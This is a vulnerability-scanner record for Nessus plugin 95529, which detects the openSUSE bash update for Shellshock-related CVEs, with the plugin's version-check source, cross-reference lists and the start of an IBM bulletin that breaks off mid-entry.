openSUSE Security Update : bash (openSUSE-2016-1374) (Shellshock)

2016-12-05T00:00:00

Description

This update for bash fixes the following issues : - CVE-2016-7543: Local attackers could have executed arbitrary commands via specially crafted SHELLOPTS+PS4 variables (bsc#1001299) - CVE-2016-0634: Malicious hostnames could have allowed arbitrary command execution when $HOSTNAME was expanded in the prompt (bsc#1000396) - CVE-2014-6277: More troubles with functions (bsc#898812, bsc#1001759) - CVE-2014-6278: Code execution after original 6271 fix (bsc#898884) This update was imported from the SUSE:SLE-12:Update update project.

{"id": "OPENSUSE-2016-1374.NASL", "type": "nessus", "bulletinFamily": "scanner", "title": "openSUSE Security Update : bash (openSUSE-2016-1374) (Shellshock)", "description": "This update for bash fixes the following issues :\n\n - CVE-2016-7543: Local attackers could have executed arbitrary commands via specially crafted SHELLOPTS+PS4 variables (bsc#1001299)\n\n - CVE-2016-0634: Malicious hostnames could have allowed arbitrary command execution when $HOSTNAME was expanded in the prompt (bsc#1000396)\n\n - CVE-2014-6277: More troubles with functions (bsc#898812, bsc#1001759)\n\n - CVE-2014-6278: Code execution after original 6271 fix (bsc#898884)\n\nThis update was imported from the SUSE:SLE-12:Update update project.", "published": "2016-12-05T00:00:00", "modified": "2021-01-19T00:00:00", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/95529", "reporter": "This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0634", "https://bugzilla.opensuse.org/show_bug.cgi?id=1000396", "https://bugzilla.opensuse.org/show_bug.cgi?id=1001759", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7543", "https://bugzilla.opensuse.org/show_bug.cgi?id=1001299", "https://bugzilla.opensuse.org/show_bug.cgi?id=898884", "https://bugzilla.opensuse.org/show_bug.cgi?id=898812"], "cvelist": ["CVE-2014-6277", "CVE-2014-6278", "CVE-2016-0634", "CVE-2016-7543"], "immutableFields": [], "lastseen": "2021-08-19T12:38:54", "viewCount": 20, "enchantments": {"dependencies": {"references": [{"type": "amazon", "idList": ["ALAS-2017-878"]}, {"type": "attackerkb", "idList": ["AKB:26BDFAC3-8C29-40D1-B3A7-C26249A3B4D7"]}, {"type": "centos", "idList": ["CESA-2017:0725", "CESA-2017:1931"]}, {"type": "cert", "idList": ["VU:252743"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1846"]}, {"type": "checkpoint_security", "idList": ["CPS:SK102673"]}, {"type": "cisco", "idList": ["CISCO-SA-20140926-BASH"]}, {"type": "citrix", "idList": ["CTX200217"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:550B80029A731B9F485A20D2CDC3D5E4"]}, {"type": "cve", "idList": ["CVE-2014-3671", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7227", "CVE-2016-0634", "CVE-2016-7543"]}, {"type": "debian", "idList": ["DEBIAN:DLA-680-1:30FF3", "DEBIAN:DLA-680-2:D564A"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2014-6277", "DEBIANCVE:CVE-2014-6278", "DEBIANCVE:CVE-2016-0634", "DEBIANCVE:CVE-2016-7543"]}, {"type": "exploitdb", "idList": ["EDB-ID:34860", "EDB-ID:35081", "EDB-ID:35115", "EDB-ID:36933", "EDB-ID:39568"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:09BAFC0653DB54EBD16EF2C94A327987", "EXPLOITPACK:83649EAC279C4825FF813B6A77320B9D", "EXPLOITPACK:9199830C2B5794BCE4073DDC29B86CF4", "EXPLOITPACK:E5E7192CCB33F46D59D3D7F6810A4AD4"]}, {"type": "f5", "idList": ["F5:K15629", "F5:K73705133", "SOL15629"]}, {"type": "fedora", "idList": ["FEDORA:60B5560776B4", "FEDORA:748636058501", "FEDORA:75D5F6087790", "FEDORA:84C386061563", "FEDORA:B96366074A58", "FEDORA:E73376017106"]}, {"type": "fortinet", "idList": ["FG-IR-14-030"]}, {"type": "freebsd", "idList": ["512D1301-49B9-11E4-AE2C-C80AA9043978", "81E2B308-4A6C-11E4-B711-6805CA0B3D42"]}, {"type": "gentoo", "idList": ["GLSA-201410-01", "GLSA-201612-39", "GLSA-201701-02"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20141024-01-BASH"]}, {"type": "ibm", "idList": ["0139C39E0ED48888EF6FC334B5A408C62415667035711D7DAE1D3BB2BBBCA3F0", "0684E6CA4C2678854DD2AF881EFBA469B9153F9B25226D0E89F7A8E363B90191", "0F73246124CA58D05064BB5D07082DCA6F2A1D48630CAAC82BCFFB4A71F45CA7", "1525B7B67DA5402BE989F9E37182D44E4D8FAE3BB181A2DBEA5C3A5BAB647E3B", "1552258BC602B501CB144C17FE55DEC12CEDE82B9F4351E9E4F47BE8C7003BA9", "1C6641956F91BACFC5632640A3A0F7C2D3293056B631EF470EE3E313F25B9DCA", "1F0A215E22C30EB485B1D487514AF1026F43B577C62A1AE805C2C9DCDDF2A921", "221250DD6B489029C97D621490473ABEB793A5150987E9EA8B66A1F61836221E", "26A7BDE71EA4560DCB34E2D71A77E04F6BD6F1464BE7B6966FCB08892C8C99B7", "2C836F9CF112063B46AB27968F0F45F13141F45BAA0BB984E47B1D31ECA4B374", "2EAC4450763B71AF0083E418641A92A7E2E6BBCFE232EABDB6D4A9B98BDB7EEA", "304E11DFAAD56C940D8828C425CAC9120407818C35DBDD77A4B892CE5F73ED7B", "3225590ACA91E6DF0E178DA31C2E57BF8B7009899CBDD520B86DCF5F0582D254", "43D6C2F69BACC643553BCB8943CE09506B5D513BE314B3093934E9025893C9BF", "4731BA355DE24384D3CFF513F9FAE2FEE084386CECD71260FBE174244F974C06", "542851630FD5F0CA12E39120280D90B66CBC639D15CC167486A7006068A5563D", "66E2077EC744F0C58908B64187C65DB343B9899133C02D3D2AD75F82D3A5771A", "6964DC74D7C00F0076CE970FCDCD238B596005A3E74FD77729ECDADA86E693C4", "6BED381F0625A1CEE6FF30731B3F37C8E1BC1D95ED40906A48FF91875BFEA753", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "7E13D30E59A5CEE3B12554F2B5EA6909CC03AF9D82EE01D0AE24331C2DCA5F2A", "906C6E45A71E8A432DE51C6A94712DDA0BBA3529963A8AFA9DCFE84E05DA7425", "92653814B5AD58699CB141C05798FBA49CD5D97ED94F23B96F6DFAA714EA627D", "9362FDC04C7CF0E7E11E00C238107A825074E1BBD7D4631CDE9FBBBA3D068B3A", "A6544AE2F106D4044D792AEEA71A0CA740A53B749B99628C2699395F9F087031", "A6C5FDEF17751F9D6EC0D701C42B168DAF0AFD9B01217970935FD1F4EB568753", "B0A90459D4D8B5BAF4898F53404E42E2AEA4F2105238CC68CC28BCABD00D3FD1", "BADBBFD3B80B37BA80822E3D89F7CE0842CD6F0C0F9476386BC6B381BF85302E", "BFA15D43F646FFC5AFD437B2E4A088CDA943E32237DE20B421F42A372083D616", "CD0F80B60649CBD9C4C6A1FFBD3F93A56B14F83A3755904C4DD84AC6E8B6719B", "D2E48469AB3A6F2B1FEAEFDF00F68B8BC2F210C7E3BBABA5556DFDE4C6DB7ECD", "D765B0E424B32B58901509C0B37E90B68BD6A9A3ED95D1DE2E1DF2893F546155", "E1446A837AA754AA9D0FE98370ECB6988935685C35B2360E6374E7415609B6F7", "E1A56F82327D8FB00BD84085E673D1401848A384A92C33B13DC0ED642E86946B", "E9875BEF8E97815B76ED1D0FD7D59E5669EDACF80D617A93E84594F2257B2901", "ED25520B668714457490EC7907530FE368D1DD7120FD7A98A7598F3BBE3A9333", "EE50B1A5AF778319698593697BE11C93BF03E19DEE9CE25FF7BD2F12582783CA"]}, {"type": "jvn", "idList": ["JVN:55667175"]}, {"type": "kitploit", "idList": ["KITPLOIT:2779031464033627796", "KITPLOIT:7323577050718865961"]}, {"type": "lenovo", "idList": ["LENOVO:PS500044-NOSID"]}, {"type": "mageia", "idList": ["MGASA-2014-0394", "MGASA-2016-0393"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-SCANNER-HTTP-APACHE_MOD_CGI_BASH_ENV-", "MSF:EXPLOIT-MULTI-HTTP-APACHE_MOD_CGI_BASH_ENV_EXEC-", "MSF:EXPLOIT-MULTI-HTTP-CUPS_BASH_ENV_EXEC-"]}, {"type": "myhack58", "idList": ["MYHACK58:62201676632"]}, {"type": "nessus", "idList": ["8982.PRM", "ALA_ALAS-2017-878.NASL", "BASH_CVE_2014_6278.NASL", "BASH_REMOTE_CODE_EXECUTION2.NASL", "CENTOS_RHSA-2017-0725.NASL", "CENTOS_RHSA-2017-1931.NASL", "CISCO-SA-20140926-BASH-NXOS.NASL", "CISCO-SA-CSCUR01959-ASA-CX.NASL", "CISCO-SA-CSCUR01959-PRSM.NASL", "CISCO_CUPS_CSCUR05454.NASL", "CISCO_TELEPRESENCE_CONDUCTOR_CSCUR02103.NASL", "CISCO_TELEPRESENCE_VCS_CSCUR01461.NASL", "CISCO_UCS_DIRECTOR_CSCUR02877.NASL", "DEBIAN_DLA-680.NASL", "EULEROS_SA-2017-1031.NASL", "EULEROS_SA-2017-1032.NASL", "EULEROS_SA-2017-1163.NASL", "EULEROS_SA-2017-1164.NASL", "EULEROS_SA-2019-1418.NASL", "F5_BIGIP_SOL15629.NASL", "F5_BIGIP_SOL73705133.NASL", "FEDORA_2016-2C4B5AD64E.NASL", "FEDORA_2016-5A54FB4784.NASL", "FEDORA_2016-62E6C462EF.NASL", "FEDORA_2016-A822B472C4.NASL", "FEDORA_2016-EDA100D886.NASL", "FEDORA_2016-F15168439D.NASL", "FREEBSD_PKG_512D130149B911E4AE2CC80AA9043978.NASL", "FREEBSD_PKG_81E2B3084A6C11E4B7116805CA0B3D42.NASL", "GENTOO_GLSA-201410-01.NASL", "GENTOO_GLSA-201612-39.NASL", "GENTOO_GLSA-201701-02.NASL", "IBM_STORWIZE_1_5_0_4.NASL", "JUNIPER_SPACE_JSA10648.NASL", "MACOSX_10_10_2.NASL", "MACOSX_10_11.NASL", "MANDRIVA_MDVSA-2015-164.NASL", "MCAFEE_EMAIL_GATEWAY_SB10085.NASL", "MCAFEE_NGFW_SB10085.NASL", "MCAFEE_WEB_GATEWAY_SB10085.NASL", "NEWSTART_CGSL_NS-SA-2019-0108_BASH.NASL", "NEWSTART_CGSL_NS-SA-2021-0118_BASH.NASL", "OPENSUSE-2014-595.NASL", "OPENSUSE-2016-1260.NASL", "OPENSUSE-2018-516.NASL", "ORACLELINUX_ELSA-2014-3092.NASL", "ORACLELINUX_ELSA-2014-3093.NASL", "ORACLELINUX_ELSA-2014-3094.NASL", "ORACLELINUX_ELSA-2017-0725.NASL", "ORACLELINUX_ELSA-2017-1931.NASL", "ORACLEVM_OVMSA-2017-0050.NASL", "PHOTONOS_PHSA-2017-0009.NASL", "PHOTONOS_PHSA-2017-0009_BASH.NASL", "PHOTONOS_PHSA-2017-0040.NASL", "PHOTONOS_PHSA-2017-0040_BASH.NASL", "REDHAT-RHSA-2017-0725.NASL", "REDHAT-RHSA-2017-1931.NASL", "SLACKWARE_SSA_2017-251-01.NASL", "SL_20170321_BASH_ON_SL6_X.NASL", "SL_20170801_BASH_ON_SL7_X.NASL", "SOLARIS11_BASH_20141031.NASL", "SOLARIS11_BASH_20141031_2.NASL", "SOLARIS11_BASH_2014_10_07.NASL", "SUSE_SU-2016-2872-1.NASL", "SUSE_SU-2017-0302-1.NASL", "SUSE_SU-2018-1398-1.NASL", "SUSE_SU-2018-1398-2.NASL", "UBUNTU_USN-2380-1.NASL", "UBUNTU_USN-3294-1.NASL", "VCENTER_OPERATIONS_MANAGER_VMSA_2014-0010.NASL", "VMWARE_NSX_VMSA_2014_0010.NASL", "VMWARE_VCENTER_CONVERTER_2014-0010.NASL", "VMWARE_VCENTER_SERVER_APPLIANCE_VMSA-2014-0010.NASL", "VMWARE_VMSA-2014-0010.NASL", "VMWARE_VMSA-2014-0010_REMOTE.NASL", "VMWARE_VSPHERE_REPLICATION_VMSA_2014_0010.NASL", "VMWARE_WORKSPACE_PORTAL_VMSA2014-0010.NASL", "WEB_APPLICATION_SCANNING_112578"]}, {"type": "nvidia", "idList": ["NVIDIA:4386"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105093", "OPENVAS:1361412562310105094", "OPENVAS:1361412562310105146", "OPENVAS:1361412562310105156", "OPENVAS:1361412562310105570", "OPENVAS:1361412562310121274", "OPENVAS:1361412562310123242", "OPENVAS:1361412562310123244", "OPENVAS:1361412562310123245", "OPENVAS:1361412562310802085", "OPENVAS:1361412562310802086", "OPENVAS:1361412562310804489", "OPENVAS:1361412562310809403", "OPENVAS:1361412562310809419", "OPENVAS:1361412562310809954", "OPENVAS:1361412562310809959", "OPENVAS:1361412562310842000", "OPENVAS:1361412562310843174", "OPENVAS:1361412562310851763", "OPENVAS:1361412562310871788", "OPENVAS:1361412562310871874", "OPENVAS:1361412562310871953", "OPENVAS:1361412562310872091", "OPENVAS:1361412562311220171031", "OPENVAS:1361412562311220171032", "OPENVAS:1361412562311220171163", "OPENVAS:1361412562311220171164", "OPENVAS:1361412562311220191418"]}, {"type": "oraclelinux", "idList": ["ELSA-2014-3092", "ELSA-2014-3093", "ELSA-2014-3094", "ELSA-2017-0725", "ELSA-2017-1931"]}, {"type": "osv", "idList": ["OSV:DLA-680-1", "OSV:DLA-680-2"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:128520", "PACKETSTORM:128535", "PACKETSTORM:128650", "PACKETSTORM:128878", "PACKETSTORM:136278", "PACKETSTORM:137344"]}, {"type": "photon", "idList": ["PHSA-2017-0009"]}, {"type": "redhat", "idList": ["RHSA-2017:0725", "RHSA-2017:1931"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-7543"]}, {"type": "saint", "idList": ["SAINT:05E28A8F33387B6034B44C6B24DA5C37", "SAINT:2BE7ACE77D7EFCD0C71244B47F95DE74", "SAINT:CCCF00F03F04F011364CEB0E35290350", "SAINT:D900A97324C56830CEAF51652E312989"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31129", "SECURITYVULNS:DOC:31147", "SECURITYVULNS:DOC:31328", "SECURITYVULNS:DOC:31679", "SECURITYVULNS:DOC:32522", "SECURITYVULNS:VULN:13977", "SECURITYVULNS:VULN:14245", "SECURITYVULNS:VULN:14702"]}, {"type": "seebug", "idList": ["SSV:87313", "SSV:87331", "SSV:87412", "SSV:88877"]}, {"type": "slackware", "idList": ["SSA-2017-251-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:1419-1", "SUSE-SU-2014:1287-1", "SUSE-SU-2017:2699-1", "SUSE-SU-2017:2700-1"]}, {"type": "threatpost", "idList": ["THREATPOST:DBB88263397DE4DA6604A2D6517DC194"]}, {"type": "ubuntu", "idList": ["USN-2380-1", "USN-3294-1", "USN-3294-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2014-6277", "UB:CVE-2014-6278", "UB:CVE-2016-0634", "UB:CVE-2016-7543"]}, {"type": "vmware", "idList": ["VMSA-2014-0010", "VMSA-2014-0010.13"]}, {"type": "zdt", "idList": ["1337DAY-ID-22754", "1337DAY-ID-22807", "1337DAY-ID-25077", "1337DAY-ID-25392"]}]}, "score": {"value": 0.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "centos", "idList": ["CESA-2017:0725", "CESA-2017:1931"]}, {"type": "checkpoint_security", "idList": ["CPS:SK102673"]}, {"type": "cisco", "idList": ["CISCO-SA-20140926-BASH"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:550B80029A731B9F485A20D2CDC3D5E4"]}, {"type": "cve", "idList": ["CVE-2014-6277", "CVE-2014-6278", "CVE-2016-7543"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2014-6277"]}, {"type": "exploitdb", "idList": ["EDB-ID:39568"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:09BAFC0653DB54EBD16EF2C94A327987", "EXPLOITPACK:E5E7192CCB33F46D59D3D7F6810A4AD4"]}, {"type": "fedora", "idList": ["FEDORA:E73376017106"]}, {"type": "freebsd", "idList": ["512D1301-49B9-11E4-AE2C-C80AA9043978"]}, {"type": "gentoo", "idList": ["GLSA-201410-01"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20141024-01-BASH"]}, {"type": "ibm", "idList": ["1F0A215E22C30EB485B1D487514AF1026F43B577C62A1AE805C2C9DCDDF2A921", "2C836F9CF112063B46AB27968F0F45F13141F45BAA0BB984E47B1D31ECA4B374", "7E13D30E59A5CEE3B12554F2B5EA6909CC03AF9D82EE01D0AE24331C2DCA5F2A", "BFA15D43F646FFC5AFD437B2E4A088CDA943E32237DE20B421F42A372083D616", "CD0F80B60649CBD9C4C6A1FFBD3F93A56B14F83A3755904C4DD84AC6E8B6719B"]}, {"type": "jvn", "idList": ["JVN:55667175"]}, {"type": "kitploit", "idList": ["KITPLOIT:7323577050718865961"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/APACHE_MOD_CGI_BASH_ENV_EXEC"]}, {"type": "nessus", "idList": ["BASH_CVE_2014_6278.NASL", "CENTOS_RHSA-2017-0725.NASL", "DEBIAN_DLA-680.NASL", "EULEROS_SA-2017-1164.NASL", "FEDORA_2016-5A54FB4784.NASL", "FEDORA_2016-62E6C462EF.NASL", "FEDORA_2016-A822B472C4.NASL", "FEDORA_2016-F15168439D.NASL", "MACOSX_10_10_2.NASL", "MANDRIVA_MDVSA-2015-164.NASL", "OPENSUSE-2014-595.NASL", "OPENSUSE-2016-1260.NASL", "ORACLELINUX_ELSA-2017-0725.NASL", "VMWARE_VCENTER_CONVERTER_2014-0010.NASL", "VMWARE_VSPHERE_REPLICATION_VMSA_2014_0010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310123242", "OPENVAS:1361412562310851763", "OPENVAS:1361412562311220191418"]}, {"type": "oraclelinux", "idList": ["ELSA-2014-3094"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:136278"]}, {"type": "redhat", "idList": ["RHSA-2017:1931"]}, {"type": "saint", "idList": ["SAINT:CCCF00F03F04F011364CEB0E35290350"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13977", "SECURITYVULNS:VULN:14245"]}, {"type": "seebug", "idList": ["SSV:87412"]}, {"type": "slackware", "idList": ["SSA-2017-251-01"]}, {"type": "suse", "idList": ["SUSE-SU-2017:2700-1"]}, {"type": "threatpost", "idList": ["THREATPOST:DBB88263397DE4DA6604A2D6517DC194"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2014-6278", "UB:CVE-2016-7543"]}, {"type": "vmware", "idList": ["VMSA-2014-0010"]}, {"type": "zdt", "idList": ["1337DAY-ID-22754", "1337DAY-ID-22807"]}]}, "exploitation": null, "vulnersScore": 0.9}, "pluginID": "95529", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-1374.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95529);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-6277\", \"CVE-2014-6278\", \"CVE-2016-0634\", \"CVE-2016-7543\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"openSUSE Security Update : bash (openSUSE-2016-1374) (Shellshock)\");\n script_summary(english:\"Check for the openSUSE-2016-1374 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for bash fixes the following issues :\n\n - CVE-2016-7543: Local attackers could have executed\n arbitrary commands via specially crafted SHELLOPTS+PS4\n variables (bsc#1001299)\n\n - CVE-2016-0634: Malicious hostnames could have allowed\n arbitrary command execution when $HOSTNAME was expanded\n in the prompt (bsc#1000396)\n\n - CVE-2014-6277: More troubles with functions (bsc#898812,\n bsc#1001759)\n\n - CVE-2014-6278: Code execution after original 6271 fix\n (bsc#898884)\n\nThis update was imported from the SUSE:SLE-12:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1000396\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1001299\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1001759\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=898812\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=898884\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/01\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/05\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bash-4.2-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bash-debuginfo-4.2-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bash-debugsource-4.2-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bash-devel-4.2-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bash-lang-4.2-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bash-loadables-4.2-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bash-loadables-debuginfo-4.2-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libreadline6-6.2-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libreadline6-debuginfo-6.2-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"readline-devel-6.2-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"bash-debuginfo-32bit-4.2-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libreadline6-32bit-6.2-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-32bit-6.2-81.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"readline-devel-32bit-6.2-81.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo-32bit / bash-debuginfo / bash-debugsource / etc\");\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["p-cpe:/a:novell:opensuse:bash", "p-cpe:/a:novell:opensuse:bash-debuginfo", "p-cpe:/a:novell:opensuse:bash-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bash-debugsource", "p-cpe:/a:novell:opensuse:bash-devel", "p-cpe:/a:novell:opensuse:bash-lang", "p-cpe:/a:novell:opensuse:bash-loadables", "p-cpe:/a:novell:opensuse:bash-loadables-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6", "p-cpe:/a:novell:opensuse:libreadline6-32bit", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit", "p-cpe:/a:novell:opensuse:readline-devel", "p-cpe:/a:novell:opensuse:readline-devel-32bit", "cpe:/o:novell:opensuse:42.1"], "solution": "Update the affected bash packages.", "nessusSeverity": "Critical", "cvssScoreSource": "", "vpr": {"risk factor": "High", "score": "7.4"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2016-12-01T00:00:00", "vulnerabilityPublicationDate": null, "exploitableWith": ["Core Impact", "Metasploit(CUPS Filter Bash Environment Variable Code Injection (Shellshock))"], "_state": {"dependencies": 1659994789, "score": 1659995174}, "_internal": {"score_hash": "43a9a18f97da87a2223e873176fcff4d"}}

{"ibm": [{"lastseen": "2022-06-28T21:58:18", "description": "## Summary\n\nMultiple security vulnerabilities have been identified in bash that is embedded in IBM FSM. This bulletin addresses these issues.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2014-6277_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>)** \nDESCRIPTION:** GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96686_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n\n**CVEID:** [_CVE-2014-6278_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>)** 